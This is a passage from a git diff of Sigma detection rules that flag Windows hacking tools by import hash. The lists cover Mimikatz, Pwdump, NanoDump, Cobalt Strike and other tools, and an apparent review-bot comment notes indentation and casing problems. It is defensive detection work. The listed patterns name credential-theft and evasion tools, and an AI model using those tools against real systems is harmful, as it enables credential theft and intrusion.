NanoDump - - ffdd59e0318b85a3e480874d9796d872 # NanoDump - - 0cf479628d7cc1ea25ec7998a92f5051 # NanoDump - - 07a2d4dcbd6cb2c6a45e6b101f0b6d51 # NanoDump - - d6d0f80386e1380d05cb78e871bc72b1 # NanoDump - - 38d9e015591bbfd4929e0d0f47fa0055 # HandleKatz - - 0e2216679ca6e1094d63322e3412d650 # HandleKatz - - ada161bf41b8e5e9132858cb54cab5fb # DripLoader - - 2a1bc4913cd5ecb0434df07cb675b798 # DripLoader - - 11083e75553baae21dc89ce8f9a195e4 # DripLoader - - a23d29c9e566f2fa8ffbb79267f5df80 # DripLoader - - 84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte - - 19584675d94829987952432e018d5056 # SysmonQuiet - - 330768a4f172e10acb6287b87289d83b # ShaprEvtMute Hook - - Hashes|contains: # Sysmon field hashes contains all types - - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # 
PetitPotam - - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam - - IMPHASH=bf6223a49e45d99094406777eb6004ba # PetitPotam - - IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6 # Mimikatz - - IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3 # Mimikatz - - IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF # Mimikatz - - IMPHASH=4C1B52A19748428E51B14C278D0F58E3 # Mimikatz - - IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F # Mimikatz - - IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A # Mimikatz - - IMPHASH=672B13F4A0B6F27D29065123FE882DFC # Mimikatz - - IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F # Mimikatz - - IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D # Mimikatz - - IMPHASH=9528A0E91E28FBB88AD433FEABCA2456 # Mimikatz - - IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3 # Mimikatz - - IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88 # Mimikatz - - IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4 # Mimikatz - - IMPHASH=D21BBC50DCC169D7B4D0F01962793154 # Mimikatz - - IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6 # Mimikatz - - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 # JuicyPotato - - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC # JuicyPotato - - IMPHASH=6118619783FC175BC7EBECFF0769B46E # RoguePotato - - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA # RoguePotato - - IMPHASH=563233BFA169ACC7892451F71AD5850A # RoguePotato - - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 # RoguePotato - - IMPHASH=13F08707F759AF6003837A150A371BA1 # Pwdump - - IMPHASH=1781F06048A7E58B323F0B9259BE798B # Pwdump - - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 # Pwdump - - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D # Pwdump - - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 # Pwdump - - IMPHASH=713C29B396B907ED71A72482759ED757 # Pwdump - - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F # Pwdump - - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E # Pwdump - - IMPHASH=8B114550386E31895DFAB371E741123D # Pwdump - - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 # PwDumpX - - IMPHASH=9D68781980370E00E0BD939EE5E6C141 # Pwdump - - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE # Pwdump - - 
IMPHASH=CB567F9498452721D77A451374955F5F # Pwdump - - IMPHASH=730073214094CD328547BF1F72289752 # Htran - - IMPHASH=17B461A082950FC6332228572138B80C # Cobalt Strike beacons - - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 # Cobalt Strike beacons - - IMPHASH=819B19D53CA6736448F9325A85736792 # Cobalt Strike beacons - - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E # Cobalt Strike beacons - - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 # PPLDump - - IMPHASH=0588081AB0E63BA785938467E1B10CCA # PPLDump - - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C # NanoDump - - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 # NanoDump - - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 # NanoDump - - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 # NanoDump - - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF # NanoDump - - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE # NanoDump - - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 # NanoDump - - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 # NanoDump - - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E # NanoDump - - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 # NanoDump - - IMPHASH=3AD59991CCF1D67339B319B15A41B35D # NanoDump - - IMPHASH=FFDD59E0318B85A3E480874D9796D872 # NanoDump - - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 # NanoDump - - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 # NanoDump - - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 # NanoDump - - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 # HandleKatz - - IMPHASH=0E2216679CA6E1094D63322E3412D650 # HandleKatz - - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB # DripLoader - - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader - - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader - - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader - - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte - - IMPHASH=19584675D94829987952432E018D5056 # SysmonQuiet - - IMPHASH=330768A4F172E10ACB6287B87289D83B # ShaprEvtMute Hook - condition: selection -fields: - - TargetFilename - - Image -falsepositives: - - Unknown -level: high +modified: 2022/09/07 tags: - - 
attack.defense_evasion - - attack.s0139 - - attack.t1564.004 + - attack.defense_evasion + - attack.s0139 + - attack.t1564.004 +logsource: + product: windows + category: create_stream_hash +definition: 'Requirements: Sysmon config with Imphash logging activated' +detection: + selection: + - Imphash: + - bcca3c247b619dcd13c8cdff5f123932 # PetitPotam + - 3a19059bd7688cb88e70005f18efc439 # PetitPotam + - bf6223a49e45d99094406777eb6004ba # PetitPotam + - 0c106686a31bfe2ba931ae1cf6e9dbc6 # Mimikatz + - 0d1447d4b3259b3c2a1d4cfb7ece13c3 # Mimikatz + - 1b0369a1e06271833f78ffa70ffb4eaf # Mimikatz + - 4c1b52a19748428e51b14c278d0f58e3 # Mimikatz + - 4d927a711f77d62cebd4f322cb57ec6f # Mimikatz + - 66ee036df5fc1004d9ed5e9a94a1086a # Mimikatz + - 672b13f4a0b6f27d29065123fe882dfc # Mimikatz + - 6bbd59cea665c4afcc2814c1327ec91f # Mimikatz + - 725bb81dc24214f6ecacc0cfb36ad30d # Mimikatz + - 9528a0e91e28fbb88ad433feabca2456 # Mimikatz + - 9da6d5d77be11712527dcab86df449a3 # Mimikatz + - a6e01bc1ab89f8d91d9eab72032aae88 # Mimikatz + - b24c5eddaea4fe50c6a96a2a133521e4 # Mimikatz + - d21bbc50dcc169d7b4d0f01962793154 # Mimikatz + - fcc251cceae90d22c392215cc9a2d5d6 # Mimikatz + - 23867a89c2b8fc733be6cf5ef902f2d1 # JuicyPotato + - a37ff327f8d48e8a4d2f757e1b6e70bc # JuicyPotato + - 6118619783fc175bc7ebecff0769b46e # RoguePotato + - 959a83047e80ab68b368fdb3f4c6e4ea # RoguePotato + - 563233bfa169acc7892451f71ad5850a # RoguePotato + - 87575cb7a0e0700eb37f2e3668671a08 # RoguePotato + - 13f08707f759af6003837a150a371ba1 # Pwdump + - 1781f06048a7e58b323f0b9259be798b # Pwdump + - 233f85f2d4bc9d6521a6caae11a1e7f5 # Pwdump + - 24af2584cbf4d60bbe5c6d1b31b3be6d # Pwdump + - 632969ddf6dbf4e0f53424b75e4b91f2 # Pwdump + - 713c29b396b907ed71a72482759ed757 # Pwdump + - 749a7bb1f0b4c4455949c0b2bf7f9e9f # Pwdump + - 8628b2608957a6b0c6330ac3de28ce2e # Pwdump + - 8b114550386e31895dfab371e741123d # Pwdump + - 94cb940a1a6b65bed4d5a8f849ce9793 # PwDumpX + - 9d68781980370e00e0bd939ee5e6c141 # Pwdump + - 
b18a1401ff8f444056d29450fbc0a6ce # Pwdump + - cb567f9498452721d77a451374955f5f # Pwdump + - 730073214094cd328547bf1f72289752 # Htran + - 17b461a082950fc6332228572138b80c # Cobalt Strike beacons + - dc25ee78e2ef4d36faa0badf1e7461c9 # Cobalt Strike beacons + - 819b19d53ca6736448f9325a85736792 # Cobalt Strike beacons + - 829da329ce140d873b4a8bde2cbfaa7e # Cobalt Strike beacons + - c547f2e66061a8dffb6f5a3ff63c0a74 # PPLDump + - 0588081ab0e63ba785938467e1b10cca # PPLDump + - 0d9ec08bac6c07d9987dfd0f1506587c # NanoDump + - bc129092b71c89b4d4c8cdf8ea590b29 # NanoDump + - 4da924cf622d039d58bce71cdf05d242 # NanoDump + - e7a3a5c377e2d29324093377d7db1c66 # NanoDump + - 9a9dbec5c62f0380b4fa5fd31deffedf # NanoDump + - af8a3976ad71e5d5fdfb67ddb8dadfce # NanoDump + - 0c477898bbf137bbd6f2a54e3b805ff4 # NanoDump + - 0ca9f02b537bcea20d4ea5eb1a9fe338 # NanoDump + - 3ab3655e5a14d4eefc547f4781bf7f9e # NanoDump + - e6f9d5152da699934b30daab206471f6 # NanoDump + - 3ad59991ccf1d67339b319b15a41b35d # NanoDump + - ffdd59e0318b85a3e480874d9796d872 # NanoDump + - 0cf479628d7cc1ea25ec7998a92f5051 # NanoDump + - 07a2d4dcbd6cb2c6a45e6b101f0b6d51 # NanoDump + - d6d0f80386e1380d05cb78e871bc72b1 # NanoDump + - 38d9e015591bbfd4929e0d0f47fa0055 # HandleKatz + - 0e2216679ca6e1094d63322e3412d650 # HandleKatz + - ada161bf41b8e5e9132858cb54cab5fb # DripLoader + - 2a1bc4913cd5ecb0434df07cb675b798 # DripLoader + - 11083e75553baae21dc89ce8f9a195e4 # DripLoader + - a23d29c9e566f2fa8ffbb79267f5df80 # DripLoader + - 4a07f944a83e8a7c2525efa35dd30e2f # CreateMiniDump + - 767637c23bb42cd5d7397cf58b0be688 # UACMe Akagi + - 14c4e4c72ba075e9069ee67f39188ad8 # UACMe Akagi + - 3c782813d4afce07bbfc5a9772acdbdc # UACMe Akagi + - 7d010c6bb6a3726f327f7e239166d127 # UACMe Akagi + - 89159ba4dd04e4ce5559f132a9964eb3 # UACMe Akagi + - 6f33f4a5fc42b8cec7314947bd13f30f # UACMe Akagi + - 5834ed4291bdeb928270428ebbaf7604 # UACMe Akagi + - 5a8a8a43f25485e7ee1b201edcbc7a38 # UACMe Akagi + - dc7d30b90b2d8abf664fbed2b1b59894 # UACMe 
Akagi + - 41923ea1f824fe63ea5beb84db7a3e74 # UACMe Akagi + - 3de09703c8e79ed2ca3f01074719906b # UACMe Akagi + - a53a02b997935fd8eedcb5f7abab9b9f # WCE + - e96a73c7bf33a464c510ede582318bf2 # WCE + - 32089b8851bbf8bc2d014e9f37288c83 # Sliver Stagers + - 09D278F9DE118EF09163C6140255C690 # Dumpert + - 03866661686829d806989e2fc5a72606 # Dumpert + - e57401fbdadcd4571ff385ab82bd5d6d # Dumpert + - 84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte + - 19584675d94829987952432e018d5056 # SysmonQuiet + - 330768a4f172e10acb6287b87289d83b # ShaprEvtMute Hook + - Hashes|contains: # Sysmon field hashes contains all types + - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam + - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam + - IMPHASH=bf6223a49e45d99094406777eb6004ba # PetitPotam + - IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6 # Mimikatz + - IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3 # Mimikatz + - IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF # Mimikatz + - IMPHASH=4C1B52A19748428E51B14C278D0F58E3 # Mimikatz + - IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F # Mimikatz + - IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A # Mimikatz + - IMPHASH=672B13F4A0B6F27D29065123FE882DFC # Mimikatz + - IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F # Mimikatz + - IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D # Mimikatz + - IMPHASH=9528A0E91E28FBB88AD433FEABCA2456 # Mimikatz + - IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3 # Mimikatz + - IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88 # Mimikatz + - IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4 # Mimikatz + - IMPHASH=D21BBC50DCC169D7B4D0F01962793154 # Mimikatz + - IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6 # Mimikatz + - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 # JuicyPotato + - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC # JuicyPotato + - IMPHASH=6118619783FC175BC7EBECFF0769B46E # RoguePotato + - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA # RoguePotato + - IMPHASH=563233BFA169ACC7892451F71AD5850A # RoguePotato + - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 # RoguePotato + - 
IMPHASH=13F08707F759AF6003837A150A371BA1 # Pwdump + - IMPHASH=1781F06048A7E58B323F0B9259BE798B # Pwdump + - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 # Pwdump + - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D # Pwdump + - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 # Pwdump + - IMPHASH=713C29B396B907ED71A72482759ED757 # Pwdump + - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F # Pwdump + - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E # Pwdump + - IMPHASH=8B114550386E31895DFAB371E741123D # Pwdump + - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 # PwDumpX + - IMPHASH=9D68781980370E00E0BD939EE5E6C141 # Pwdump + - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE # Pwdump + - IMPHASH=CB567F9498452721D77A451374955F5F # Pwdump + - IMPHASH=730073214094CD328547BF1F72289752 # Htran + - IMPHASH=17B461A082950FC6332228572138B80C # Cobalt Strike beacons + - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 # Cobalt Strike beacons + - IMPHASH=819B19D53CA6736448F9325A85736792 # Cobalt Strike beacons + - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E # Cobalt Strike beacons + - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 # PPLDump + - IMPHASH=0588081AB0E63BA785938467E1B10CCA # PPLDump + - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C # NanoDump + - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 # NanoDump + - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 # NanoDump + - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 # NanoDump + - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF # NanoDump + - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE # NanoDump + - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 # NanoDump + - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 # NanoDump + - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E # NanoDump + - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 # NanoDump + - IMPHASH=3AD59991CCF1D67339B319B15A41B35D # NanoDump + - IMPHASH=FFDD59E0318B85A3E480874D9796D872 # NanoDump + - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 # NanoDump + - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 # NanoDump + - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 # NanoDump + - 
IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 # HandleKatz + - IMPHASH=0E2216679CA6E1094D63322E3412D650 # HandleKatz + - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB # DripLoader + - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader + - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader + - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader + - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F # CreateMiniDump + - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 # UACMe Akagi + - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 # UACMe Akagi + - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC # UACMe Akagi + - IMPHASH=7D010C6BB6A3726F327F7E239166D127 # UACMe Akagi + - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 # UACMe Akagi + - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F # UACMe Akagi + - IMPHASH=5834ED4291BDEB928270428EBBAF7604 # UACMe Akagi + - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 # UACMe Akagi + - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 # UACMe Akagi + - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 # UACMe Akagi + - IMPHASH=3DE09703C8E79ED2CA3F01074719906B # UACMe Akagi + - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F # WCE + - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 # WCE + - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 # Sliver Stagers + - IMPHASH=09D278F9DE118EF09163C6140255C690 # Dumpert + - IMPHASH=03866661686829d806989e2fc5a72606 # Dumpert + - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d # Dumpert + - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte + - IMPHASH=19584675D94829987952432E018D5056 # SysmonQuiet + - IMPHASH=330768A4F172E10ACB6287B87289D83B # ShaprEvtMute Hook + condition: selection +fields: + - TargetFilename + - Image +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml b/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml index ea0687c01..dbfc4fd4b 100644 --- a/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml 
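Review bot: The re-indentation appears to move `definition:` out of `logsource:` — on the old side it follows `- product:` / `- category:` with the same nesting, while on the new side `+definition: 'Requirements: Sysmon config with Imphash logging activated'` is written flush with `+logsource:` and `+detection:` rather than under them. In the Sigma rule schema `definition` is only meaningful inside `logsource`; as a top-level key it is unknown to the linter and the requirement note is detached from the log source it describes, so it should be indented back next to `category: create_stream_hash`. The rest of the hunk is an indentation change plus the CreateMiniDump, UACMe, WCE, Sliver, Dumpert and SysmonQuiet hashes copied from the process_creation rule; they look consistent between the `Imphash` and `Hashes|contains` lists, except that the Dumpert and `bf6223…` PetitPotam entries are lowercase inside a `Hashes|contains` list that otherwise mirrors Sysmon's uppercase `IMPHASH=` output, and `# ShaprEvtMute Hook` is a typo for SharpEvtMute.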
+++ b/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml 
@@ -4,183 +4,189 @@ description: Detects the use of Windows hacktools based on their import hash (im status: experimental author: Florian Roth references: - - Internal Research + - Internal Research date: 2022/03/04 -modified: 2022/08/20 +modified: 2022/09/07 logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection: - - Imphash: - - bcca3c247b619dcd13c8cdff5f123932 # PetitPotam - - 3a19059bd7688cb88e70005f18efc439 # PetitPotam - - bf6223a49e45d99094406777eb6004ba # PetitPotam - - 0c106686a31bfe2ba931ae1cf6e9dbc6 # Mimikatz - - 0d1447d4b3259b3c2a1d4cfb7ece13c3 # Mimikatz - - 1b0369a1e06271833f78ffa70ffb4eaf # Mimikatz - - 4c1b52a19748428e51b14c278d0f58e3 # Mimikatz - - 4d927a711f77d62cebd4f322cb57ec6f # Mimikatz - - 66ee036df5fc1004d9ed5e9a94a1086a # Mimikatz - - 672b13f4a0b6f27d29065123fe882dfc # Mimikatz - - 6bbd59cea665c4afcc2814c1327ec91f # Mimikatz - - 725bb81dc24214f6ecacc0cfb36ad30d # Mimikatz - - 9528a0e91e28fbb88ad433feabca2456 # Mimikatz - - 9da6d5d77be11712527dcab86df449a3 # Mimikatz - - a6e01bc1ab89f8d91d9eab72032aae88 # Mimikatz - - b24c5eddaea4fe50c6a96a2a133521e4 # Mimikatz - - d21bbc50dcc169d7b4d0f01962793154 # Mimikatz - - fcc251cceae90d22c392215cc9a2d5d6 # Mimikatz - - 23867a89c2b8fc733be6cf5ef902f2d1 # JuicyPotato - - a37ff327f8d48e8a4d2f757e1b6e70bc # JuicyPotato - - 6118619783fc175bc7ebecff0769b46e # RoguePotato - - 959a83047e80ab68b368fdb3f4c6e4ea # RoguePotato - - 563233bfa169acc7892451f71ad5850a # RoguePotato - - 87575cb7a0e0700eb37f2e3668671a08 # RoguePotato - - 13f08707f759af6003837a150a371ba1 # Pwdump - - 1781f06048a7e58b323f0b9259be798b # Pwdump - - 233f85f2d4bc9d6521a6caae11a1e7f5 # Pwdump - - 24af2584cbf4d60bbe5c6d1b31b3be6d # Pwdump - - 632969ddf6dbf4e0f53424b75e4b91f2 # Pwdump - - 713c29b396b907ed71a72482759ed757 # Pwdump - - 749a7bb1f0b4c4455949c0b2bf7f9e9f # Pwdump - - 8628b2608957a6b0c6330ac3de28ce2e # Pwdump - - 8b114550386e31895dfab371e741123d # Pwdump - - 
94cb940a1a6b65bed4d5a8f849ce9793 # PwDumpX - - 9d68781980370e00e0bd939ee5e6c141 # Pwdump - - b18a1401ff8f444056d29450fbc0a6ce # Pwdump - - cb567f9498452721d77a451374955f5f # Pwdump - - 730073214094cd328547bf1f72289752 # Htran - - 17b461a082950fc6332228572138b80c # Cobalt Strike beacons - - dc25ee78e2ef4d36faa0badf1e7461c9 # Cobalt Strike beacons - - 819b19d53ca6736448f9325a85736792 # Cobalt Strike beacons - - 829da329ce140d873b4a8bde2cbfaa7e # Cobalt Strike beacons - - c547f2e66061a8dffb6f5a3ff63c0a74 # PPLDump - - 0588081ab0e63ba785938467e1b10cca # PPLDump - - 0d9ec08bac6c07d9987dfd0f1506587c # NanoDump - - bc129092b71c89b4d4c8cdf8ea590b29 # NanoDump - - 4da924cf622d039d58bce71cdf05d242 # NanoDump - - e7a3a5c377e2d29324093377d7db1c66 # NanoDump - - 9a9dbec5c62f0380b4fa5fd31deffedf # NanoDump - - af8a3976ad71e5d5fdfb67ddb8dadfce # NanoDump - - 0c477898bbf137bbd6f2a54e3b805ff4 # NanoDump - - 0ca9f02b537bcea20d4ea5eb1a9fe338 # NanoDump - - 3ab3655e5a14d4eefc547f4781bf7f9e # NanoDump - - e6f9d5152da699934b30daab206471f6 # NanoDump - - 3ad59991ccf1d67339b319b15a41b35d # NanoDump - - ffdd59e0318b85a3e480874d9796d872 # NanoDump - - 0cf479628d7cc1ea25ec7998a92f5051 # NanoDump - - 07a2d4dcbd6cb2c6a45e6b101f0b6d51 # NanoDump - - d6d0f80386e1380d05cb78e871bc72b1 # NanoDump - - 38d9e015591bbfd4929e0d0f47fa0055 # HandleKatz - - 0e2216679ca6e1094d63322e3412d650 # HandleKatz - - ada161bf41b8e5e9132858cb54cab5fb # DripLoader - - 2a1bc4913cd5ecb0434df07cb675b798 # DripLoader - - 11083e75553baae21dc89ce8f9a195e4 # DripLoader - - a23d29c9e566f2fa8ffbb79267f5df80 # DripLoader - - 4a07f944a83e8a7c2525efa35dd30e2f # CreateMiniDump - - 767637c23bb42cd5d7397cf58b0be688 # UACMe Akagi - - 14c4e4c72ba075e9069ee67f39188ad8 # UACMe Akagi - - 3c782813d4afce07bbfc5a9772acdbdc # UACMe Akagi - - 7d010c6bb6a3726f327f7e239166d127 # UACMe Akagi - - 89159ba4dd04e4ce5559f132a9964eb3 # UACMe Akagi - - 6f33f4a5fc42b8cec7314947bd13f30f # UACMe Akagi - - 5834ed4291bdeb928270428ebbaf7604 # UACMe Akagi - - 
5a8a8a43f25485e7ee1b201edcbc7a38 # UACMe Akagi - - dc7d30b90b2d8abf664fbed2b1b59894 # UACMe Akagi - - 41923ea1f824fe63ea5beb84db7a3e74 # UACMe Akagi - - 3de09703c8e79ed2ca3f01074719906b # UACMe Akagi - - a53a02b997935fd8eedcb5f7abab9b9f # WCE - - e96a73c7bf33a464c510ede582318bf2 # WCE - - 32089b8851bbf8bc2d014e9f37288c83 # Sliver Stagers - - 09D278F9DE118EF09163C6140255C690 # Dumpert - - 03866661686829d806989e2fc5a72606 # Dumpert - - e57401fbdadcd4571ff385ab82bd5d6d # Dumpert - - Hashes|contains: # Sysmon field hashes contains all types - - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam - - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam - - IMPHASH=bf6223a49e45d99094406777eb6004ba # PetitPotam - - IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6 # Mimikatz - - IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3 # Mimikatz - - IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF # Mimikatz - - IMPHASH=4C1B52A19748428E51B14C278D0F58E3 # Mimikatz - - IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F # Mimikatz - - IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A # Mimikatz - - IMPHASH=672B13F4A0B6F27D29065123FE882DFC # Mimikatz - - IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F # Mimikatz - - IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D # Mimikatz - - IMPHASH=9528A0E91E28FBB88AD433FEABCA2456 # Mimikatz - - IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3 # Mimikatz - - IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88 # Mimikatz - - IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4 # Mimikatz - - IMPHASH=D21BBC50DCC169D7B4D0F01962793154 # Mimikatz - - IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6 # Mimikatz - - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 # JuicyPotato - - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC # JuicyPotato - - IMPHASH=6118619783FC175BC7EBECFF0769B46E # RoguePotato - - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA # RoguePotato - - IMPHASH=563233BFA169ACC7892451F71AD5850A # RoguePotato - - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 # RoguePotato - - IMPHASH=13F08707F759AF6003837A150A371BA1 # Pwdump - - 
IMPHASH=1781F06048A7E58B323F0B9259BE798B # Pwdump - - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 # Pwdump - - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D # Pwdump - - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 # Pwdump - - IMPHASH=713C29B396B907ED71A72482759ED757 # Pwdump - - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F # Pwdump - - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E # Pwdump - - IMPHASH=8B114550386E31895DFAB371E741123D # Pwdump - - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 # PwDumpX - - IMPHASH=9D68781980370E00E0BD939EE5E6C141 # Pwdump - - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE # Pwdump - - IMPHASH=CB567F9498452721D77A451374955F5F # Pwdump - - IMPHASH=730073214094CD328547BF1F72289752 # Htran - - IMPHASH=17B461A082950FC6332228572138B80C # Cobalt Strike beacons - - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 # Cobalt Strike beacons - - IMPHASH=819B19D53CA6736448F9325A85736792 # Cobalt Strike beacons - - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E # Cobalt Strike beacons - - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 # PPLDump - - IMPHASH=0588081AB0E63BA785938467E1B10CCA # PPLDump - - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C # NanoDump - - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 # NanoDump - - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 # NanoDump - - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 # NanoDump - - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF # NanoDump - - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE # NanoDump - - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 # NanoDump - - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 # NanoDump - - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E # NanoDump - - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 # NanoDump - - IMPHASH=3AD59991CCF1D67339B319B15A41B35D # NanoDump - - IMPHASH=FFDD59E0318B85A3E480874D9796D872 # NanoDump - - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 # NanoDump - - 